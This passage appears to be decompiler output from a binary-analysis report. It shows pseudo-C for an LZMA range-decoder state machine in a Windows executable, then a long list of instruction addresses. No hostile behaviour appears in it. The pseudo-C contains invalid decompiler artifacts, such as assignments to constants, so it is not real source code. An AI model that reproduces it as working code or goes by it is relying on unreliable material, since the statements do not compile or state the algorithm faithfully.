												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406895
0x00406895
0x00406899
0x004068ba
0x004068c1
0x004068c7
0x004068cd
0x004068df
0x004068e5
0x004068ea
0x00000000
0x0040689b
0x004068a1
0x00406c62
0x00406c62
0x00406c62
0x00406c65
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00406cb3
0x00406cb7
0x00406e66
0x00406e7c
0x00406e84
0x00406e8b
0x00406e8d
0x00406e94
0x00406e98
0x00406e98
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cde
0x00406cde
0x0040647a
0x0040647a
0x0040647a
0x00406483
0x00000000
0x00000000
0x00406489
0x00000000
0x00406494
0x00000000
0x00000000
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f3
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00000000
0x00406de5
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00000000
0x00406df4
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065f6
0x004065f8
0x004065fb
0x0040666c
0x0040666f
0x00406672
0x00406679
0x00406683
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x004065fd
0x00406601
0x00406604
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x0040661e
0x00406622
0x00406629
0x0040662c
0x00406633
0x00406637
0x0040663f
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406643
0x00406646
0x00406664
0x00406666
0x00000000
0x00406648
0x00406648
0x0040664b
0x0040664e
0x00406651
0x00406653
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x00000000
0x0040665f
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406903
0x00406926
0x00406929
0x0040692c
0x00406936
0x00406905
0x00406905
0x00406908
0x0040690b
0x0040690e
0x0040691b
0x0040691e
0x0040691e
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00000000
0x00406942
0x00406946
0x00000000
0x00000000
0x0040694c
0x00406950
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695c
0x0040695c
0x0040695f
0x00406963
0x00000000
0x00000000
0x004069b3
0x004069b7
0x004069be
0x004069c1
0x004069c4
0x004069ce
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c62
0x004069b9
0x00000000
0x00000000
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x004069f4
0x004069f4
0x004069f7
0x004069fa
0x004069fd
0x004069fd
0x00406a00
0x00406a07
0x00406a0c
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00406e00
0x00000000
0x00406e00
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066ae
0x004066b1
0x004066b4
0x004066b4
0x004066b7
0x004066ba
0x00000000
0x00000000
0x004066c0
0x004066c6
0x00000000
0x00000000
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066f7
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672a
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x00406733
0x0040673a
0x0040673d
0x00000000
0x00406743
0x00000000
0x00406743
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x00406767
0x0040676a
0x0040676d
0x0040676d
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406790
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bb
0x004067bd
0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c0
0x004067c7
0x004067ca
0x00000000
0x004067cc
0x00000000
0x004067cc
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d1
0x00000000
0x00000000
0x0040680c
0x0040680c
0x00406810
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682b
0x0040682e
0x00406831
0x00406831
0x00406837
0x004067d5
0x004067d5
0x004067d8
0x00000000
0x004067d8
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406854
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x0040687f
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x00406884
0x0040688b
0x0040688e
0x00000000
0x00406890
0x00000000
0x00406890
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x004068ed
0x004068ed
0x004068f0
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00000000
0x00406c2c
0x00406c30
0x00406c52
0x00406c55
0x00406c5f
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c62
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3c
0x00406c3f
0x00000000
0x00000000
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00406d20
0x00406d20
0x00000000
0x00406d20
